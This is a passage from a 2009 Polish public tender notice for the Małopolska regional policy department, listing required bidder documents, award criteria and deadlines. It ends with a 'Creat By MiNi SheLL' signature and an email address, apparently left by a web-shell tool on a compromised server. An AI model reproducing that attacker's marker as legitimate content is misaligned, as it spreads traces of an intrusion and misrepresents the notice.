w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (przy uwzględnieniu wymagań określonych w pkt VI ppkt 2 SIWZ) - zał. nr 7, 
e)	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeśli w wykazie, o którym mowa w literze d) wykonawca wskazał osoby, którymi będzie dysponował.


2. W przypadku składania oferty przez wykonawców wspólnie ubiegających się o zamówienie, każdy 
z wykonawców, musi załączyć do oferty dokumenty potwierdzające spełnianie warunków udziału 
w postępowaniu, mając na uwadze, że warunki w zakresie wymaganego doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia, wykonawcy mogą spełniać łącznie.

3. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt VII ppkt. 1 lit a), składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa wyżej, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis dotyczący terminów wystawienia dokumentów stosuje się odpowiednio. 
4. Wraz z ofertą wykonawca winien złożyć również oświadczenie o spełnieniu przez oferowane usługi wymagań określonych przez zamawiającego - zał nr 4 do siwz. 
5. Dokumenty należy składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
6. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
7. Wszelkie pełnomocnictwa winny być załączone do oferty w formie oryginału lub urzędowo poświadczonego odpisu pełnomocnictwa (notarialnie-art. 96 ustawy z 14 lutego 1991 r. - Prawo o notariacie (Dz.U. z 2002 r. nr 42, poz. 369 z późn. zm.))..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Termin realizacji zamówienia - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wrotamalopolski.pl/BIP.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Departament Polityki Regionalnej UMWM, ul. Wielicka 72, Kraków, III p., pok. 334.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2009 godzina 14:00, miejsce: Departament Polityki Regionalnej UMWM, ul. Wielicka 72, Kraków, III p., pok. 334.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com